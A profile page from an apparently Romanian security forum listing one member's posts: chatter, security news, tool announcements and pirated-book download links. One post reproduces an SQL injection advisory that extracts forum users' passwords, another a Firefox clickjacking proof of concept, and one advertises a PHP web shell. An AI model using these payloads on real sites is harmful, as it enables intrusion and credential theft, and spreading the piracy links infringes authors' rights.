Jump to content

begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. Ieri am fost la o tarie la un prieten acasa, 7 baieti si 2 femei. Nu ne cunosteam decat trei si n-am vrut sa-i lasam pe ceilalti afara din discutie, ne punem la o narghilea si incepem sa filosofam, dar cum toti suntem gameri inraiti de strategie, am zis sa propun un subiect comun : Definitia matematica a iubirii. Am dezbatut noi mult si bine, iar un coleg, vine cu un raspuns ce ne-a lasat masca : A il iubeste pe B daca si numai daca A ar alege sa nu-l tradeze pe B in orice dilema a prizonierului. As vrea sa aud parerile voastre, se poate defini iubirea in cifre ?
  2. treci pe torrents.ro
  3. GSM operators have began adopting the more secure A5/3 cipher, which is used to encrypt traffic passing over 3G networks. However, when 3G coverage is not available, phones drop back to the insecure 2G standard.
  4. http://rstcenter.com/forum/24523-puzlbox-1-0-0-0-php-fuzzer-tool.rst?highlight=PuzlBox dupe
  5. are cont cril pe rst
  6. E invazie de copilasi de 12 ani, nu doar aici. Restu intre 15-18 vor sa fie ajutati cu tot felul de abureli, habar nu au foloseasca google. Iar restu' is lenesi. Cei "batrani" de pe RST, cand au vazut invazia de copilasi au dat bir cu fugitii. Uite, de exemplu acum am timp si m-am apucat calumea de visual c++, tutoriale on line cacalau. python urmeaza. Apoi probabil ASM. Vacanta asta oricum ploua zilnic => de ce nu as pune mana pe "carte" ?
  7. parolele sunt prea lungi.
  8. The Dell KACE Secure Browser uses application virtualization technology to provide an isolated instance of Firefox to secure what has become a common entry point for malware. The browser aims to proactively contain threats before they become a problem. The new technology provides users with a virtual instance of an Internet browser application. By running the browser in a virtual instance, the browser and any activity resulting from its use are separated from the endpoint keeping the actual computer and operating system free of changes that would normally occur. Fully contained from the operating system, any such changes made via browser activity are not only kept separated, but may also be quickly cleared with a single click. For even more security and control, optional white and black list entries may be used to limit what sites a user may visit and what applications the browser is permitted to launch. The Dell KACE Secure Browser introduces: A simple installation package that includes the Firefox browser along with Adobe Reader and Flash plug-ins pre-installed Easy website restriction policies allowing only specified sites to be accessed, and further, prevention of access to any chosen restricted sites Full remote insight and control when used with the K1000 Management Appliance for advanced management capabilities, offering an innovative and revealing view into current browser activity as well as the ability to remotely reset or terminate a remote instance. Free secure browser protects against security attacks http://www.kace.com/products/freetools/secure-browser/download.php
  9. Sophos has released the Sophos Windows Shortcut Exploit Protection Tool, which protects against a vulnerability that allows malicious hackers to exploit a bug in the way that all versions of Windows handles .LNK shortcut files. If Windows just displays the icon of an exploited shortcut file, malicious code can be executed - without requiring any interaction by the user, but Sophos's tool intercepts shortcut files that contain the exploit, warning of the executable code that was attempting to run. That means it will stop malicious threats which use the vulnerability if they are on non-local disks, such as a USB stick. "So far we have seen the Stuxnet and Dulkis worms, as well as the Chymin Trojan horse, exploiting the shortcut vulnerability to help them spread and infect computer systems. Stuxnet made the headlines because it targeted the Siemens SCADA systems that look after critical infrastructure like power plants - but there's a warning for all computer users here," said Graham Cluley, senior technology consultant at Sophos. "Details of how to exploit the security hole are now published on the web, meaning it is child's play for other hackers to take advantage and create attacks." "No-one knows when Microsoft will roll-out a proper patch for this critical security hole, and its current workaround leaves systems almost unworkable with broken-looking icons," continued Cluley. "The free tool from Sophos can be run alongside any existing anti-virus software, providing generic protection against the exploit. Unlike Microsoft's workaround, it doesn't blank out all the shortcuts on your Windows Start Menu - meaning your life - and that of your users - will be less stressful." Free tool to protect against Windows ".LNK" zero-day flaw
  10. According to security services provider Secunia, the latest version of Apple's QuickTime 7 media player for Windows contains a critical vulnerability that could be exploited by an attacker to compromise a user's system. The security specialist says that the issue is caused by a boundary error in the streaming component used by QuickTime and can be used to initiate a stack-based buffer overflow. For an attack to be successful, a victim must first open a specially crafted web page. QuickTime 7.6.6 (build 1671), released at the end of March, 2010, is the latest version of the 7.x branch. It was released to close a total of 16 critical vulnerabilities, all of which could be used by an attacker to inject and execute arbitrary code with the users current privileges. It's currently unclear if previous versions of QuickTime for Windows or Mac OS X are affected. Apple has yet to respond to respond to the advisory. Critical vulnerability in QuickTime 7.6.6 - The H Security: News and Features
  11. fara sharecash n shituri. luati frumos panda usb vaccine
  12. The Freenet Project - /tools instalezi FMS. (linkul merge doar daca ruleaza freenet pe comp) si freetalk parca-i bun, nu mai stiu sigur. Index of /alpha/plugins/Freetalk
  13. pe freeboardurile de pe freenet. e PLIN. pute de asta.
  14. E unul dintre cele mai apreciate bloguri care se ocupa cu arta scrierii de exploituri, in special pentru platforma windows. http://www.corelan.be:8800/
  15. PuzlBox is a PHP fuzz tool that scans for several different vulnerabilities by performing dynamic program analysis. It can detect the following vulnerabilities: Arbitrary Command Execution Arbitrary PHP Execution Local File Inclusion Aribtray File Read/Write/Change/Rename/Delete SQL Injection Reflected Cross-site Scripting Download: http://sourceforge.net Usage PuzlBox must be run as administrator! puzlbox [-s Server (default localhost)] [-m Scan Modes (default CFLPSX)] [Absolute Web Root] [-n No Unhook] [Application Paths (comma delimited)] Security-Shell: PuzlBox 1.0.0.0 - PHP fuzzer tool
  16. ====================================================================# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability # Date: 25/07/2010 # Author: 3v0 aka evolution <evolution ^ darkedition.com> # Software Link: http://www.ballettin.com # Tested on: Windows Xp Pack 3 ==================================================================== #1 - Vulnerable File ------------------------------------------------------ [+] File: http://www.site.com/alinti.php?mesajid= [+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1 #2 - Insecure Cookie ------------------------------------------------------ javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1"; After go to http://www.site.com/ust.php ====================================================================
  17. Do you fancy a bit of electronic practice? Do you have some knowledge on electronics? Here you have some interesting books: 51 High Tech Practical Jokes For The Evil Genius 101 Outer Space Projects for the Evil Genius Electronic Circuits for the Evil Genius Electronic Gadgets For The Evil Genius - 28 Diy Projects McGraw-Hill - Electronics Sensors for the Evil Genius (2009) Mechatronics for the Evil Genius Mind Performance Projects For The Evil Genius - 19 Brain-Bending More Electronics Gadgets for the Evil Genius - 40 new build-it yourself projects MultiCircuit Board Projects (extra) - scanned Solary Energy For The Evil Genius Have Fun! *Every page of PDF's printable. 123 PIC microcontroller experiment for the evil genius Targets: -Introduces you to programming and customising the PIC MCU step-by-step - you don't need to be whiz to get started, but you will be when you are finished. -Shows you how to set up yoru own PICmicro MCU and development lab based on one inexpensive Microchip PICkit 1 starter kit. Vividly explain the science and electronics underlying microcontrollers. -Gives you enjoyable step-by-step experiments that build your skills, one small increment at a time. Teach you how to program PIC micros in both C and assembly language. -Show you how to interface sensors, switches, LED's, LCD's, and other commonly used electronic interfaces. -Offers step by step experiments that develop handy resource routines in assembly language. -Challenges you yo strech the limits of PIC MCU applications. -Suggests exciting directions you can take your new programming skills. -Supplies parts lists and program listing. F05C8AE4192D4DBBE98430A1D69F3FF0FE8A8293 Electronic Projects - Evil Genius Colection Torrent - Seedpeer
      • 2
      • Upvote
  18. ******************************************************************************* Gramatica limbii romane in scheme si tabele ******************************************************************************* ------------------------------------------------------------------------------- General Information ------------------------------------------------------------------------------- Type.................: Book ------------------------------------------------------------------------------- Release Notes ------------------------------------------------------------------------------- Denumire: Gramatica limbii rom?ne ?n scheme si tabele Autor: Tamara Cazacu, Diana Vrabie Gen: Education An: 2005 Limba: Rom?na Despre carte: Gramatica limbii rom?ne ?n scheme si tabele" contine un set din 49 de tabele si scheme cu caracter aplicativ, practic care au menirea de a facilita studierea gramaticii in plan functional. ------------------------------------------------------------------------------- Generated with Cool NFO Creator - Free Tools for Repair All Windows Errors ------------------------------------------------------------------------------- MD5 : d181f71456202348f726ce00703a59d3 Multiupload.com - upload your files to multiple file hosting sites! http://rapidshare.com/files/408936219/Gramatica_limbii_romane_in_scheme_si_tabele.pdf http://www.megaupload.com/?d=U1HQ9ZI6 http://depositfiles.com/en/files/ldwv88icx http://hotfile.com/dl/57381370/ed7783e/Gramatica_limbii_romane_in_scheme_si_tabele.pdf.html http://www.zshare.net/download/78659690fe6c3616/ http://uploading.com/files/6da4b2cc/Gramatica%2Blimbii%2Bromane%2Bin%2Bscheme%2Bsi%2Btabele.pdf/
  19. <html><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title>FF3.6.7/SM 2.0.6 ClickJacking Vulnerability</title> </head><body> <div id="mydiv" onmouseover="document.location='http://www.mozilla.org';" style="border: 0px none ; background: rgb(0, 0, 0) none repeat scroll 0% 0%; position: absolute; width: 2px; height: 2px; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"></div> <script> function clickjack_armor(evt) { clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX; clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY; document.getElementById('mydiv').style.left=clickjack_mouseX-1; document.getElementById('mydiv').style.top=clickjack_mouseY-1; } </script> <center> <br> <center><h1><font face="Calibri">Firefox 3.6.7 / SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1> <p> </p> <div style="border-top-style: solid; border-top-width: 1px; padding-top: 1px"> <b><br><br> <a href="http://www.Securitylab.ir" onclick="clickjack_armor(event)"> Go to the http://www.Securitylab.ir : (http://www.mozilla.org)</a></b></div> <div style="border-bottom-style: solid; border-bottom-width: 1px; padding-bottom: 1px"> <p> </div> <p> </p> </center> <div style="border-top-style: solid; border-top-width: 1px; border-bottom-style: solid; border-bottom-width: 1px; padding-top: 1px; padding-bottom: 1px"> <b><font face="Calibri">Pouya Daneshmand, Securitylab.ir</font></b></div> </center></body></html>
  20. Ubuntu Privacy Remix (UPR) developers released a new modified version of the Linux Ubuntu operating system and now are available for download online. UPR is a Live CD Destro that aims to provide users with an environment that allows to safely handling personal information, the system installed on the computer running UPR remains untouched. The risk of theft of such private data arises not only from “conventional” criminals, trojans. rootkits, keyloggers etc. Ubuntu Privacy Remix is a tool to protect your data against unsolicited access. To mitigate the risks Ubuntu Privacy Remix tries to create such a working environment on any PC with the following measures: • The system resides on a read-only CD, Spyware and other malicious software cannot be installed permanently. • The system completely ignores any potentially compromised local (S-)ATA hard disks. • The system kernel is modified so that it cannot activate any network hardware. No LAN/WLAN/Bleutooth/Infrared etc. • The system is based on free software which can be verified in source code. • To ease working with a non-modifiable system, UPR introduces “extended TrueCrypt-Volumes”, which can store program configuration like GnuPG settings, OpenOffice dictionaries etc. permanently and securely within an encrypted volume. The OS software component, including the system kernel, has been updated to the latest versions and as a result the creators managed to get rid of some bugs and vulnerabilities. In addition to the CD version there is a special utility to create bootable USB-drive directly from the protected environment. you can download Ubuntu Privacy Remix 9.04r3 here. Secure Live-CD Ubuntu Privacy Remix 9.04r3 is Out! | SecTechno
  21. "primu venit primul servit." pm gata. prodil89 si temp. am mai primit 3 care vrea pm me ! Krisler12™, ronin33dan, informatician. gata, s-au dat. io vi-am dat conturile degeaba ? majoriatea aveti upload si download 0.
  22. hellscream, ignora-i.
  23. nu mai fa threaduri aiurea, posteaza in sticky.
  24. asta jur ca-l cumpar. nu stiu exact dar cred ca dau email pentru detalii.
  25. PHPJackal is a PHP script that can be used to manage files, perform safemode bypass, has crackers built-in, various network scanners and more.
×
×
  • Create New...